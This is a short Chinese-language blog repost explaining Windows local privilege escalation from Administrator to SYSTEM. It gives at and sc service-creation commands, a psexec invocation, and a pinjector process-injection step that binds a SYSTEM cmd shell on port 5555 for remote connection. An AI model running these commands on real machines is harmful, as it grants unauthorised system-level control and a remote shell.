首页 > 其他 > 详细

本地提权

时间:2020-11-29 11:44:31      阅读:19      评论:0      收藏:0      [点我收藏+]

0X01从管理员到system

可以看见这里我们是administrator 我们要提升到system

技术分享图片

0X0a at命令提权

at xx:xx(时间)\interactive cmd

技术分享图片

技术分享图片

不适用于 win2008以后的版本

0x0bSC命令提权

?    sc Create syscmd binPath= "cmd /K start" type= own type= interact 
?    sc start syscmd 

 

 技术分享图片

技术分享图片

0X0C WINDOWS内核提权

?    系统设置管理功能 
?    SysInternal Suite 
?    https://technet.microsoft.com/en-us/sysinternals/bb545027 下载地址
?    psexec -i -s -d taskmgr 

技术分享图片

0X02注入进程提权

技术分享图片

 

 看见是system进行的进程 我们的目的是将我们的进程注入到任意的system执行的进程里面这样我们的权限就是system权限了

pinjector.exe -l 查看当前可以注入的进程

技术分享图片

然后我们外网直接连接目标ip的5555端口就是cmd界面了

技术分享图片

 

 看见直接成功了

 

这有点类似于 nc提权

 

转载:https://www.cnblogs.com/-zhong/p/11039584.html

本地提权

原文:https://www.cnblogs.com/bailan/p/14055652.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!